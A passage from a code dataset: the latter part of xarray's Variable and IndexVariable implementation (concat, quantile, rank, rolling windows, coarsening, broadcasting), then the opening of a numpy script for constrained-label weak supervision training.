if keepdims:
# Insert np.newaxis for removed dims
slices = tuple(
np.newaxis if i in removed_axes else slice(None, None)
for i in range(self.ndim)
)
if getattr(data, "shape", None) is None:
# Reduce has produced a scalar value, not an array-like
data = np.asanyarray(data)[slices]
else:
data = data[slices]
dims = self.dims
else:
dims = [
adim for n, adim in enumerate(self.dims) if n not in removed_axes
]
if keep_attrs is None:
keep_attrs = _get_keep_attrs(default=False)
attrs = self._attrs if keep_attrs else None
return Variable(dims, data, attrs=attrs)
@classmethod
def concat(
cls,
variables,
dim="concat_dim",
positions=None,
shortcut=False,
combine_attrs="override",
):
"""Concatenate variables along a new or existing dimension.
Parameters
----------
variables : iterable of Variable
Arrays to stack together. Each variable is expected to have
matching dimensions and shape except for along the stacked
dimension.
dim : str or DataArray, optional
Name of the dimension to stack along. This can either be a new
dimension name, in which case it is added along axis=0, or an
existing dimension name, in which case the location of the
dimension is unchanged. Where to insert the new dimension is
determined by the first variable.
positions : None or list of array-like, optional
List of integer arrays which specifies the integer positions to
which to assign each dataset along the concatenated dimension.
If not supplied, objects are concatenated in the provided order.
shortcut : bool, optional
This option is used internally to speed-up groupby operations.
If `shortcut` is True, some checks of internal consistency between
arrays to concatenate are skipped.
combine_attrs : {"drop", "identical", "no_conflicts", "drop_conflicts", \
"override"}, default: "override"
String indicating how to combine attrs of the objects being merged:
- "drop": empty attrs on returned Dataset.
- "identical": all attrs must be the same on every object.
- "no_conflicts": attrs from all objects are combined, any that have
the same name must also have the same value.
- "drop_conflicts": attrs from all objects are combined, any that have
the same name but different values are dropped.
- "override": skip comparing and copy attrs from the first dataset to
the result.
Returns
-------
stacked : Variable
Concatenated Variable formed by stacking all the supplied variables
along the given dimension.
"""
from .merge import merge_attrs
if not isinstance(dim, str):
(dim,) = dim.dims
# can't do this lazily: we need to loop through variables at least
# twice
variables = list(variables)
first_var = variables[0]
arrays = [v.data for v in variables]
if dim in first_var.dims:
axis = first_var.get_axis_num(dim)
dims = first_var.dims
data = duck_array_ops.concatenate(arrays, axis=axis)
if positions is not None:
# TODO: deprecate this option -- we don't need it for groupby
# any more.
indices = nputils.inverse_permutation(np.concatenate(positions))
data = duck_array_ops.take(data, indices, axis=axis)
else:
axis = 0
dims = (dim,) + first_var.dims
data = duck_array_ops.stack(arrays, axis=axis)
attrs = merge_attrs(
[var.attrs for var in variables], combine_attrs=combine_attrs
)
encoding = dict(first_var.encoding)
if not shortcut:
for var in variables:
if var.dims != first_var.dims:
raise ValueError(
f"Variable has dimensions {list(var.dims)} but first Variable has dimensions {list(first_var.dims)}"
)
return cls(dims, data, attrs, encoding)
def equals(self, other, equiv=duck_array_ops.array_equiv):
"""True if two Variables have the same dimensions and values;
otherwise False.
Variables can still be equal (like pandas objects) if they have NaN
values in the same locations.
This method is necessary because `v1 == v2` for Variables
does element-wise comparisons (like numpy.ndarrays).
"""
other = getattr(other, "variable", other)
try:
return self.dims == other.dims and (
self._data is other._data or equiv(self.data, other.data)
)
except (TypeError, AttributeError):
return False
def broadcast_equals(self, other, equiv=duck_array_ops.array_equiv):
"""True if two Variables have the values after being broadcast against
each other; otherwise False.
Variables can still be equal (like pandas objects) if they have NaN
values in the same locations.
"""
try:
self, other = broadcast_variables(self, other)
except (ValueError, AttributeError):
return False
return self.equals(other, equiv=equiv)
def identical(self, other, equiv=duck_array_ops.array_equiv):
"""Like equals, but also checks attributes."""
try:
return utils.dict_equiv(self.attrs, other.attrs) and self.equals(
other, equiv=equiv
)
except (TypeError, AttributeError):
return False
def no_conflicts(self, other, equiv=duck_array_ops.array_notnull_equiv):
"""True if the intersection of two Variable's non-null data is
equal; otherwise false.
Variables can thus still be equal if there are locations where either,
or both, contain NaN values.
"""
return self.broadcast_equals(other, equiv=equiv)
def quantile(
self, q, dim=None, interpolation="linear", keep_attrs=None, skipna=True
):
"""Compute the qth quantile of the data along the specified dimension.
Returns the qth quantiles(s) of the array elements.
Parameters
----------
q : float or sequence of float
Quantile to compute, which must be between 0 and 1
inclusive.
dim : str or sequence of str, optional
Dimension(s) over which to apply quantile.
interpolation : {"linear", "lower", "higher", "midpoint", "nearest"}, default: "linear"
This optional parameter specifies the interpolation method to
use when the desired quantile lies between two data points
``i < j``:
* linear: ``i + (j - i) * fraction``, where ``fraction`` is
the fractional part of the index surrounded by ``i`` and
``j``.
* lower: ``i``.
* higher: ``j``.
* nearest: ``i`` or ``j``, whichever is nearest.
* midpoint: ``(i + j) / 2``.
keep_attrs : bool, optional
If True, the variable's attributes (`attrs`) will be copied from
the original object to the new one. If False (default), the new
object will be returned without attributes.
Returns
-------
quantiles : Variable
If `q` is a single quantile, then the result
is a scalar. If multiple percentiles are given, first axis of
the result corresponds to the quantile and a quantile dimension
is added to the return array. The other dimensions are the
dimensions that remain after the reduction of the array.
See Also
--------
numpy.nanquantile, pandas.Series.quantile, Dataset.quantile
DataArray.quantile
"""
from .computation import apply_ufunc
_quantile_func = np.nanquantile if skipna else np.quantile
if keep_attrs is None:
keep_attrs = _get_keep_attrs(default=False)
scalar = utils.is_scalar(q)
q = np.atleast_1d(np.asarray(q, dtype=np.float64))
if dim is None:
dim = self.dims
if utils.is_scalar(dim):
dim = [dim]
def _wrapper(npa, **kwargs):
# move quantile axis to end. required for apply_ufunc
return np.moveaxis(_quantile_func(npa, **kwargs), 0, -1)
axis = np.arange(-1, -1 * len(dim) - 1, -1)
result = apply_ufunc(
_wrapper,
self,
input_core_dims=[dim],
exclude_dims=set(dim),
output_core_dims=[["quantile"]],
output_dtypes=[np.float64],
dask_gufunc_kwargs=dict(output_sizes={"quantile": len(q)}),
dask="parallelized",
kwargs={"q": q, "axis": axis, "interpolation": interpolation},
)
# for backward compatibility
result = result.transpose("quantile", ...)
if scalar:
result = result.squeeze("quantile")
if keep_attrs:
result.attrs = self._attrs
return result
def rank(self, dim, pct=False):
"""Ranks the data.
Equal values are assigned a rank that is the average of the ranks that
would have been otherwise assigned to all of the values within that
set. Ranks begin at 1, not 0. If `pct`, computes percentage ranks.
NaNs in the input array are returned as NaNs.
The `bottleneck` library is required.
Parameters
----------
dim : str
Dimension over which to compute rank.
pct : bool, optional
If True, compute percentage ranks, otherwise compute integer ranks.
Returns
-------
ranked : Variable
See Also
--------
Dataset.rank, DataArray.rank
"""
import bottleneck as bn
data = self.data
if is_duck_dask_array(data):
raise TypeError(
"rank does not work for arrays stored as dask "
"arrays. Load the data via .compute() or .load() "
"prior to calling this method."
)
elif not isinstance(data, np.ndarray):
raise TypeError(
"rank is not implemented for {} objects.".format(type(data))
)
axis = self.get_axis_num(dim)
func = bn.nanrankdata if self.dtype.kind == "f" else bn.rankdata
ranked = func(data, axis=axis)
if pct:
count = np.sum(~np.isnan(data), axis=axis, keepdims=True)
ranked /= count
return Variable(self.dims, ranked)
def rolling_window(
self, dim, window, window_dim, center=False, fill_value=dtypes.NA
):
"""
Make a rolling_window along dim and add a new_dim to the last place.
Parameters
----------
dim : str
Dimension over which to compute rolling_window.
For nd-rolling, should be list of dimensions.
window : int
Window size of the rolling
For nd-rolling, should be list of integers.
window_dim : str
New name of the window dimension.
For nd-rolling, should be list of strings.
center : bool, default: False
If True, pad fill_value for both ends. Otherwise, pad in the head
of the axis.
fill_value
value to be filled.
Returns
-------
Variable that is a view of the original array with a added dimension of
size w.
The return dim: self.dims + (window_dim, )
The return shape: self.shape + (window, )
Examples
--------
>>> v = Variable(("a", "b"), np.arange(8).reshape((2, 4)))
>>> v.rolling_window("b", 3, "window_dim")
<xarray.Variable (a: 2, b: 4, window_dim: 3)>
array([[[nan, nan, 0.],
[nan, 0., 1.],
[ 0., 1., 2.],
[ 1., 2., 3.]],
<BLANKLINE>
[[nan, nan, 4.],
[nan, 4., 5.],
[ 4., 5., 6.],
[ 5., 6., 7.]]])
>>> v.rolling_window("b", 3, "window_dim", center=True)
<xarray.Variable (a: 2, b: 4, window_dim: 3)>
array([[[nan, 0., 1.],
[ 0., 1., 2.],
[ 1., 2., 3.],
[ 2., 3., nan]],
<BLANKLINE>
[[nan, 4., 5.],
[ 4., 5., 6.],
[ 5., 6., 7.],
[ 6., 7., nan]]])
"""
if fill_value is dtypes.NA: # np.nan is passed
dtype, fill_value = dtypes.maybe_promote(self.dtype)
var = self.astype(dtype, copy=False)
else:
dtype = self.dtype
var = self
if utils.is_scalar(dim):
for name, arg in zip(
["window", "window_dim", "center"], [window, window_dim, center]
):
if not utils.is_scalar(arg):
raise ValueError(
f"Expected {name}={arg!r} to be a scalar like 'dim'."
)
dim = [dim]
# dim is now a list
nroll = len(dim)
if utils.is_scalar(window):
window = [window] * nroll
if utils.is_scalar(window_dim):
window_dim = [window_dim] * nroll
if utils.is_scalar(center):
center = [center] * nroll
if (
len(dim) != len(window)
or len(dim) != len(window_dim)
or len(dim) != len(center)
):
raise ValueError(
"'dim', 'window', 'window_dim', and 'center' must be the same length. "
f"Received dim={dim!r}, window={window!r}, window_dim={window_dim!r},"
f" and center={center!r}."
)
pads = {}
for d, win, cent in zip(dim, window, center):
if cent:
start = win // 2 # 10 -> 5, 9 -> 4
end = win - 1 - start
pads[d] = (start, end)
else:
pads[d] = (win - 1, 0)
padded = var.pad(pads, mode="constant", constant_values=fill_value)
axis = [self.get_axis_num(d) for d in dim]
new_dims = self.dims + tuple(window_dim)
return Variable(
new_dims,
duck_array_ops.sliding_window_view(
padded.data, window_shape=window, axis=axis
),
)
def coarsen(
self, windows, func, boundary="exact", side="left", keep_attrs=None, **kwargs
):
"""
Apply reduction function.
"""
windows = {k: v for k, v in windows.items() if k in self.dims}
if keep_attrs is None:
keep_attrs = _get_keep_attrs(default=True)
if keep_attrs:
_attrs = self.attrs
else:
_attrs = None
if not windows:
return self._replace(attrs=_attrs)
reshaped, axes = self.coarsen_reshape(windows, boundary, side)
if isinstance(func, str):
name = func
func = getattr(duck_array_ops, name, None)
if func is None:
raise NameError(f"{name} is not a valid method.")
return self._replace(data=func(reshaped, axis=axes, **kwargs), attrs=_attrs)
def coarsen_reshape(self, windows, boundary, side):
"""
Construct a reshaped-array for coarsen
"""
if not utils.is_dict_like(boundary):
boundary = {d: boundary for d in windows.keys()}
if not utils.is_dict_like(side):
side = {d: side for d in windows.keys()}
# remove unrelated dimensions
boundary = {k: v for k, v in boundary.items() if k in windows}
side = {k: v for k, v in side.items() if k in windows}
for d, window in windows.items():
if window <= 0:
raise ValueError(
f"window must be > 0. Given {window} for dimension {d}"
)
variable = self
for d, window in windows.items():
# trim or pad the object
size = variable.shape[self._get_axis_num(d)]
n = int(size / window)
if boundary[d] == "exact":
if n * window != size:
raise ValueError(
f"Could not coarsen a dimension of size {size} with "
f"window {window} and boundary='exact'. Try a different 'boundary' option."
)
elif boundary[d] == "trim":
if side[d] == "left":
variable = variable.isel({d: slice(0, window * n)})
else:
excess = size - window * n
variable = variable.isel({d: slice(excess, None)})
elif boundary[d] == "pad": # pad
pad = window * n - size
if pad < 0:
pad += window
if side[d] == "left":
pad_width = {d: (0, pad)}
else:
pad_width = {d: (pad, 0)}
variable = variable.pad(pad_width, mode="constant")
else:
raise TypeError(
"{} is invalid for boundary. Valid option is 'exact', "
"'trim' and 'pad'".format(boundary[d])
)
shape = []
axes = []
axis_count = 0
for i, d in enumerate(variable.dims):
if d in windows:
size = variable.shape[i]
shape.append(int(size / windows[d]))
shape.append(windows[d])
axis_count += 1
axes.append(i + axis_count)
else:
shape.append(variable.shape[i])
return variable.data.reshape(shape), tuple(axes)
def isnull(self, keep_attrs: bool = None):
"""Test each value in the array for whether it is a missing value.
Returns
-------
isnull : Variable
Same type and shape as object, but the dtype of the data is bool.
See Also
--------
pandas.isnull
Examples
--------
>>> var = xr.Variable("x", [1, np.nan, 3])
>>> var
<xarray.Variable (x: 3)>
array([ 1., nan, 3.])
>>> var.isnull()
<xarray.Variable (x: 3)>
array([False, True, False])
"""
from .computation import apply_ufunc
if keep_attrs is None:
keep_attrs = _get_keep_attrs(default=False)
return apply_ufunc(
duck_array_ops.isnull,
self,
dask="allowed",
keep_attrs=keep_attrs,
)
def notnull(self, keep_attrs: bool = None):
"""Test each value in the array for whether it is not a missing value.
Returns
-------
notnull : Variable
Same type and shape as object, but the dtype of the data is bool.
See Also
--------
pandas.notnull
Examples
--------
>>> var = xr.Variable("x", [1, np.nan, 3])
>>> var
<xarray.Variable (x: 3)>
array([ 1., nan, 3.])
>>> var.notnull()
<xarray.Variable (x: 3)>
array([ True, False, True])
"""
from .computation import apply_ufunc
if keep_attrs is None:
keep_attrs = _get_keep_attrs(default=False)
return apply_ufunc(
duck_array_ops.notnull,
self,
dask="allowed",
keep_attrs=keep_attrs,
)
@property
def real(self):
return self._replace(data=self.data.real)
@property
def imag(self):
return self._replace(data=self.data.imag)
def __array_wrap__(self, obj, context=None):
return Variable(self.dims, obj)
def _unary_op(self, f, *args, **kwargs):
keep_attrs = kwargs.pop("keep_attrs", None)
if keep_attrs is None:
keep_attrs = _get_keep_attrs(default=True)
with np.errstate(all="ignore"):
result = self.__array_wrap__(f(self.data, *args, **kwargs))
if keep_attrs:
result.attrs = self.attrs
return result
def _binary_op(self, other, f, reflexive=False):
if isinstance(other, (xr.DataArray, xr.Dataset)):
return NotImplemented
if reflexive and issubclass(type(self), type(other)):
other_data, self_data, dims = _broadcast_compat_data(other, self)
else:
self_data, other_data, dims = _broadcast_compat_data(self, other)
keep_attrs = _get_keep_attrs(default=False)
attrs = self._attrs if keep_attrs else None
with np.errstate(all="ignore"):
new_data = (
f(self_data, other_data) if not reflexive else f(other_data, self_data)
)
result = Variable(dims, new_data, attrs=attrs)
return result
def _inplace_binary_op(self, other, f):
if isinstance(other, xr.Dataset):
raise TypeError("cannot add a Dataset to a Variable in-place")
self_data, other_data, dims = _broadcast_compat_data(self, other)
if dims != self.dims:
raise ValueError("dimensions cannot change for in-place operations")
with np.errstate(all="ignore"):
self.values = f(self_data, other_data)
return self
def _to_numeric(self, offset=None, datetime_unit=None, dtype=float):
"""A (private) method to convert datetime array to numeric dtype
See duck_array_ops.datetime_to_numeric
"""
numeric_array = duck_array_ops.datetime_to_numeric(
self.data, offset, datetime_unit, dtype
)
return type(self)(self.dims, numeric_array, self._attrs)
def _unravel_argminmax(
self,
argminmax: str,
dim: Union[Hashable, Sequence[Hashable], None],
axis: Union[int, None],
keep_attrs: Optional[bool],
skipna: Optional[bool],
) -> Union["Variable", Dict[Hashable, "Variable"]]:
"""Apply argmin or argmax over one or more dimensions, returning the result as a
dict of DataArray that can be passed directly to isel.
"""
if dim is None and axis is None:
warnings.warn(
"Behaviour of argmin/argmax with neither dim nor axis argument will "
"change to return a dict of indices of each dimension. To get a "
"single, flat index, please use np.argmin(da.data) or "
"np.argmax(da.data) instead of da.argmin() or da.argmax().",
DeprecationWarning,
stacklevel=3,
)
argminmax_func = getattr(duck_array_ops, argminmax)
if dim is ...:
# In future, should do this also when (dim is None and axis is None)
dim = self.dims
if (
dim is None
or axis is not None
or not isinstance(dim, Sequence)
or isinstance(dim, str)
):
# Return int index if single dimension is passed, and is not part of a
# sequence
return self.reduce(
argminmax_func, dim=dim, axis=axis, keep_attrs=keep_attrs, skipna=skipna
)
# Get a name for the new dimension that does not conflict with any existing
# dimension
newdimname = "_unravel_argminmax_dim_0"
count = 1
while newdimname in self.dims:
newdimname = f"_unravel_argminmax_dim_{count}"
count += 1
stacked = self.stack({newdimname: dim})
result_dims = stacked.dims[:-1]
reduce_shape = tuple(self.sizes[d] for d in dim)
result_flat_indices = stacked.reduce(argminmax_func, axis=-1, skipna=skipna)
result_unravelled_indices = duck_array_ops.unravel_index(
result_flat_indices.data, reduce_shape
)
result = {
d: Variable(dims=result_dims, data=i)
for d, i in zip(dim, result_unravelled_indices)
}
if keep_attrs is None:
keep_attrs = _get_keep_attrs(default=False)
if keep_attrs:
for v in result.values():
v.attrs = self.attrs
return result
def argmin(
self,
dim: Union[Hashable, Sequence[Hashable]] = None,
axis: int = None,
keep_attrs: bool = None,
skipna: bool = None,
) -> Union["Variable", Dict[Hashable, "Variable"]]:
"""Index or indices of the minimum of the Variable over one or more dimensions.
If a sequence is passed to 'dim', then result returned as dict of Variables,
which can be passed directly to isel(). If a single str is passed to 'dim' then
returns a Variable with dtype int.
If there are multiple minima, the indices of the first one found will be
returned.
Parameters
----------
dim : hashable, sequence of hashable or ..., optional
The dimensions over which to find the minimum. By default, finds minimum over
all dimensions - for now returning an int for backward compatibility, but
this is deprecated, in future will return a dict with indices for all
dimensions; to return a dict with all dimensions now, pass '...'.
axis : int, optional
Axis over which to apply `argmin`. Only one of the 'dim' and 'axis' arguments
can be supplied.
keep_attrs : bool, optional
If True, the attributes (`attrs`) will be copied from the original
object to the new one. If False (default), the new object will be
returned without attributes.
skipna : bool, optional
If True, skip missing values (as marked by NaN). By default, only
skips missing values for float dtypes; other dtypes either do not
have a sentinel missing value (int) or skipna=True has not been
implemented (object, datetime64 or timedelta64).
Returns
-------
result : Variable or dict of Variable
See Also
--------
DataArray.argmin, DataArray.idxmin
"""
return self._unravel_argminmax("argmin", dim, axis, keep_attrs, skipna)
def argmax(
self,
dim: Union[Hashable, Sequence[Hashable]] = None,
axis: int = None,
keep_attrs: bool = None,
skipna: bool = None,
) -> Union["Variable", Dict[Hashable, "Variable"]]:
"""Index or indices of the maximum of the Variable over one or more dimensions.
If a sequence is passed to 'dim', then result returned as dict of Variables,
which can be passed directly to isel(). If a single str is passed to 'dim' then
returns a Variable with dtype int.
If there are multiple maxima, the indices of the first one found will be
returned.
Parameters
----------
dim : hashable, sequence of hashable or ..., optional
The dimensions over which to find the maximum. By default, finds maximum over
all dimensions - for now returning an int for backward compatibility, but
this is deprecated, in future will return a dict with indices for all
dimensions; to return a dict with all dimensions now, pass '...'.
axis : int, optional
Axis over which to apply `argmin`. Only one of the 'dim' and 'axis' arguments
can be supplied.
keep_attrs : bool, optional
If True, the attributes (`attrs`) will be copied from the original
object to the new one. If False (default), the new object will be
returned without attributes.
skipna : bool, optional
If True, skip missing values (as marked by NaN). By default, only
skips missing values for float dtypes; other dtypes either do not
have a sentinel missing value (int) or skipna=True has not been
implemented (object, datetime64 or timedelta64).
Returns
-------
result : Variable or dict of Variable
See Also
--------
DataArray.argmax, DataArray.idxmax
"""
return self._unravel_argminmax("argmax", dim, axis, keep_attrs, skipna)
class IndexVariable(Variable):
"""Wrapper for accommodating a pandas.Index in an xarray.Variable.
IndexVariable preserve loaded values in the form of a pandas.Index instead
of a NumPy array. Hence, their values are immutable and must always be one-
dimensional.
They also have a name property, which is the name of their sole dimension
unless another name is given.
"""
__slots__ = ()
def __init__(self, dims, data, attrs=None, encoding=None, fastpath=False):
super().__init__(dims, data, attrs, encoding, fastpath)
if self.ndim != 1:
raise ValueError(f"{type(self).__name__} objects must be 1-dimensional")
# Unlike in Variable, always eagerly load values into memory
if not isinstance(self._data, PandasIndex):
self._data = PandasIndex(self._data)
def __dask_tokenize__(self):
from dask.base import normalize_token
# Don't waste time converting pd.Index to np.ndarray
return normalize_token((type(self), self._dims, self._data.array, self._attrs))
def load(self):
# data is already loaded into memory for IndexVariable
return self
# https://github.com/python/mypy/issues/1465
@Variable.data.setter # type: ignore[attr-defined]
def data(self, data):
raise ValueError(
f"Cannot assign to the .data attribute of dimension coordinate a.k.a IndexVariable {self.name!r}. "
f"Please use DataArray.assign_coords, Dataset.assign_coords or Dataset.assign as appropriate."
)
@Variable.values.setter # type: ignore[attr-defined]
def values(self, values):
raise ValueError(
f"Cannot assign to the .values attribute of dimension coordinate a.k.a IndexVariable {self.name!r}. "
f"Please use DataArray.assign_coords, Dataset.assign_coords or Dataset.assign as appropriate."
)
def chunk(self, chunks={}, name=None, lock=False):
# Dummy - do not chunk. This method is invoked e.g. by Dataset.chunk()
return self.copy(deep=False)
def _as_sparse(self, sparse_format=_default, fill_value=_default):
# Dummy
return self.copy(deep=False)
def _to_dense(self):
# Dummy
return self.copy(deep=False)
def _finalize_indexing_result(self, dims, data):
if getattr(data, "ndim", 0) != 1:
# returns Variable rather than IndexVariable if multi-dimensional
return Variable(dims, data, self._attrs, self._encoding)
else:
return self._replace(dims=dims, data=data)
def __setitem__(self, key, value):
raise TypeError(f"{type(self).__name__} values cannot be modified")
@classmethod
def concat(
cls,
variables,
dim="concat_dim",
positions=None,
shortcut=False,
combine_attrs="override",
):
"""Specialized version of Variable.concat for IndexVariable objects.
This exists because we want to avoid converting Index objects to NumPy
arrays, if possible.
"""
from .merge import merge_attrs
if not isinstance(dim, str):
(dim,) = dim.dims
variables = list(variables)
first_var = variables[0]
if any(not isinstance(v, cls) for v in variables):
raise TypeError(
"IndexVariable.concat requires that all input "
"variables be IndexVariable objects"
)
indexes = [v._data.array for v in variables]
if not indexes:
data = []
else:
data = indexes[0].append(indexes[1:])
if positions is not None:
indices = nputils.inverse_permutation(np.concatenate(positions))
data = data.take(indices)
# keep as str if possible as pandas.Index uses object (converts to numpy array)
data = maybe_coerce_to_str(data, variables)
attrs = merge_attrs(
[var.attrs for var in variables], combine_attrs=combine_attrs
)
if not shortcut:
for var in variables:
if var.dims != first_var.dims:
raise ValueError("inconsistent dimensions")
return cls(first_var.dims, data, attrs)
def copy(self, deep=True, data=None):
"""Returns a copy of this object.
`deep` is ignored since data is stored in the form of
pandas.Index, which is already immutable. Dimensions, attributes
and encodings are always copied.
Use `data` to create a new object with the same structure as
original but entirely new data.
Parameters
----------
deep : bool, optional
Deep is ignored when data is given. Whether the data array is
loaded into memory and copied onto the new object. Default is True.
data : array_like, optional
Data to use in the new object. Must have same shape as original.
Returns
-------
object : Variable
New object with dimensions, attributes, encodings, and optionally
data copied from original.
"""
if data is None:
data = self._data.copy(deep=deep)
else:
data = as_compatible_data(data)
if self.shape != data.shape:
raise ValueError(
"Data shape {} must match shape of object {}".format(
data.shape, self.shape
)
)
return self._replace(data=data)
def equals(self, other, equiv=None):
# if equiv is specified, super up
if equiv is not None:
return super().equals(other, equiv)
# otherwise use the native index equals, rather than looking at _data
other = getattr(other, "variable", other)
try:
return self.dims == other.dims and self._data_equals(other)
except (TypeError, AttributeError):
return False
def _data_equals(self, other):
return self.to_index().equals(other.to_index())
def to_index_variable(self):
"""Return this variable as an xarray.IndexVariable"""
return self
to_coord = utils.alias(to_index_variable, "to_coord")
def to_index(self):
"""Convert this variable to a pandas.Index"""
# n.b. creating a new pandas.Index from an old pandas.Index is
# basically free as pandas.Index objects are immutable
assert self.ndim == 1
index = self._data.array
if isinstance(index, pd.MultiIndex):
# set default names for multi-index unnamed levels so that
# we can safely rename dimension / coordinate later
valid_level_names = [
name or "{}_level_{}".format(self.dims[0], i)
for i, name in enumerate(index.names)
]
index = index.set_names(valid_level_names)
else:
index = index.set_names(self.name)
return index
@property
def level_names(self):
"""Return MultiIndex level names or None if this IndexVariable has no
MultiIndex.
"""
index = self.to_index()
if isinstance(index, pd.MultiIndex):
return index.names
else:
return None
def get_level_variable(self, level):
"""Return a new IndexVariable from a given MultiIndex level."""
if self.level_names is None:
raise ValueError(f"IndexVariable {self.name!r} has no MultiIndex")
index = self.to_index()
return type(self)(self.dims, index.get_level_values(level))
@property
def name(self):
return self.dims[0]
@name.setter
def name(self, value):
raise AttributeError("cannot modify name of IndexVariable in-place")
# for backwards compatibility
Coordinate = utils.alias(IndexVariable, "Coordinate")
def _unified_dims(variables):
# validate dimensions
all_dims = {}
for var in variables:
var_dims = var.dims
if len(set(var_dims)) < len(var_dims):
raise ValueError(
"broadcasting cannot handle duplicate "
f"dimensions: {list(var_dims)!r}"
)
for d, s in zip(var_dims, var.shape):
if d not in all_dims:
all_dims[d] = s
elif all_dims[d] != s:
raise ValueError(
"operands cannot be broadcast together "
f"with mismatched lengths for dimension {d!r}: {(all_dims[d], s)}"
)
return all_dims
def _broadcast_compat_variables(*variables):
"""Create broadcast compatible variables, with the same dimensions.
Unlike the result of broadcast_variables(), some variables may have
dimensions of size 1 instead of the size of the broadcast dimension.
"""
dims = tuple(_unified_dims(variables))
return tuple(var.set_dims(dims) if var.dims != dims else var for var in variables)
def broadcast_variables(*variables):
"""Given any number of variables, return variables with matching dimensions
and broadcast data.
The data on the returned variables will be a view of the data on the
corresponding original arrays, but dimensions will be reordered and
inserted so that both broadcast arrays have the same dimensions. The new
dimensions are sorted in order of appearance in the first variable's
dimensions followed by the second variable's dimensions.
"""
dims_map = _unified_dims(variables)
dims_tuple = tuple(dims_map)
return tuple(
var.set_dims(dims_map) if var.dims != dims_tuple else var for var in variables
)
def _broadcast_compat_data(self, other):
if all(hasattr(other, attr) for attr in ["dims", "data", "shape", "encoding"]):
# `other` satisfies the necessary Variable API for broadcast_variables
new_self, new_other = _broadcast_compat_variables(self, other)
self_data = new_self.data
other_data = new_other.data
dims = new_self.dims
else:
# rely on numpy broadcasting rules
self_data = self.data
other_data = other
dims = self.dims
return self_data, other_data, dims
def concat(
variables,
dim="concat_dim",
positions=None,
shortcut=False,
combine_attrs="override",
):
"""Concatenate variables along a new or existing dimension.
Parameters
----------
variables : iterable of Variable
Arrays to stack together. Each variable is expected to have
matching dimensions and shape except for along the stacked
dimension.
dim : str or DataArray, optional
Name of the dimension to stack along. This can either be a new
dimension name, in which case it is added along axis=0, or an
existing dimension name, in which case the location of the
dimension is unchanged. Where to insert the new dimension is
determined by the first variable.
positions : None or list of array-like, optional
List of integer arrays which specifies the integer positions to which
to assign each dataset along the concatenated dimension. If not
supplied, objects are concatenated in the provided order.
shortcut : bool, optional
This option is used internally to speed-up groupby operations.
If `shortcut` is True, some checks of internal consistency between
arrays to concatenate are skipped.
combine_attrs : {"drop", "identical", "no_conflicts", "drop_conflicts", \
"override"}, default: "override"
String indicating how to combine attrs of the objects being merged:
- "drop": empty attrs on returned Dataset.
- "identical": all attrs must be the same on every object.
- "no_conflicts": attrs from all objects are combined, any that have
the same name must also have the same value.
- "drop_conflicts": attrs from all objects are combined, any that have
the same name but different values are dropped.
- "override": skip comparing and copy attrs from the first dataset to
the result.
Returns
-------
stacked : Variable
Concatenated Variable formed by stacking all the supplied variables
along the given dimension.
"""
variables = list(variables)
if all(isinstance(v, IndexVariable) for v in variables):
return IndexVariable.concat(variables, dim, positions, shortcut, combine_attrs)
else:
return Variable.concat(variables, dim, positions, shortcut, combine_attrs)
def assert_unique_multiindex_level_names(variables):
"""Check for uniqueness of MultiIndex level names in all given
variables.
Not public API. Used for checking consistency of DataArray and Dataset
objects.
"""
level_names = defaultdict(list)
all_level_names = set()
for var_name, var in variables.items():
if isinstance(var._data, PandasIndex):
idx_level_names = var.to_index_variable().level_names
if idx_level_names is not None:
for n in idx_level_names:
level_names[n].append(f"{n!r} ({var_name})")
if idx_level_names:
all_level_names.update(idx_level_names)
for k, v in level_names.items():
if k in variables:
v.append(f"({k})")
duplicate_names = [v for v in level_names.values() if len(v) > 1]
if duplicate_names:
conflict_str = "\n".join(", ".join(v) for v in duplicate_names)
raise ValueError(f"conflicting MultiIndex level name(s):\n{conflict_str}")
# Check confliction between level names and dimensions GH:2299
for k, v in variables.items():
for d in v.dims:
if d in all_level_names:
raise ValueError(
"conflicting level / dimension names. {} "
"already exists as a level name.".format(d)
)
| 36.763875 | 124 | 0.590678 |
ace09d675eac85450da123ef76aa6a06f5ed5dce | 3,371 | py | Python | train_CLL.py | VTCSML/Constrained-Labeling-for-Weakly-Supervised-Learning | 9a248e92cdecd17e9799a6cd3a4f1978e2c794ef | [
"MIT"
] | 2 | 2021-06-23T22:50:21.000Z | 2021-08-03T05:17:39.000Z | train_CLL.py | VTCSML/Constrained-Labeling-for-Weakly-Supervised-Learning | 9a248e92cdecd17e9799a6cd3a4f1978e2c794ef | [
"MIT"
] | null | null | null | train_CLL.py | VTCSML/Constrained-Labeling-for-Weakly-Supervised-Learning | 9a248e92cdecd17e9799a6cd3a4f1978e2c794ef | [
"MIT"
] | null | null | null | import numpy as np
def bound_loss(y, a_matrix, bounds):
"""
Computes the gradient of lagrangian inequality penalty parameters
:param y: size (num_data, num_class) of estimated labels for the data
:type y: ndarray
:param a_matrix: size (num_weak, num_data, num_class) of a constraint matrix
:type a_matrix: ndarray
:param bounds: size (num_weak, num_class) of the bounds for the constraint
:type bounds: ndarray
:return: loss of the constraint (num_weak, num_class)
:rtype: ndarray
"""
constraint = np.zeros(bounds.shape)
n, k = y.shape
for i, current_a in enumerate(a_matrix):
constraint[i] = np.sum(current_a * y, axis=0)
return constraint - bounds
def y_gradient(y, constraint_set):
"""
Computes y gradient
"""
constraint_keys = constraint_set['constraints']
gradient = 0
for key in constraint_keys:
current_constraint = constraint_set[key]
a_matrix = current_constraint['A']
bound_loss = current_constraint['bound_loss']
for i, _ in enumerate(a_matrix):
constraint = a_matrix[i]
gradient += 2*constraint * bound_loss[i]
return gradient
def run_constraints(y, rho, constraint_set, iters=300, enable_print=False):
# Run constraints from CLL
constraint_keys = constraint_set['constraints']
n, k = y.shape
rho = n
grad_sum = 0
for iteration in range(iters):
print_constraints = [iteration]
print_builder = "Iteration %d, "
constraint_viol = []
viol_text = ''
for key in constraint_keys:
current_constraint = constraint_set[key]
a_matrix = current_constraint['A']
bounds = current_constraint['b']
# get bound loss for constraint
loss = bound_loss(y, a_matrix, bounds)
# update constraint values
constraint_set[key]['bound_loss'] = loss
violation = np.linalg.norm(loss.clip(min=0))
print_builder += key + "_viol: %.4e "
print_constraints.append(violation)
viol_text += key + "_viol: %.4e "
constraint_viol.append(violation)
y_grad = y_gradient(y, constraint_set)
grad_sum += y_grad**2
y = y - y_grad / np.sqrt(grad_sum + 1e-8)
y = np.clip(y, a_min=0, a_max=1)
constraint_set['violation'] = [viol_text, constraint_viol]
if enable_print:
print(print_builder % tuple(print_constraints))
return y
def train_algorithm(constraint_set):
"""
Trains CLL algorithm
:param constraint_set: dictionary containing error constraints of the weak signals
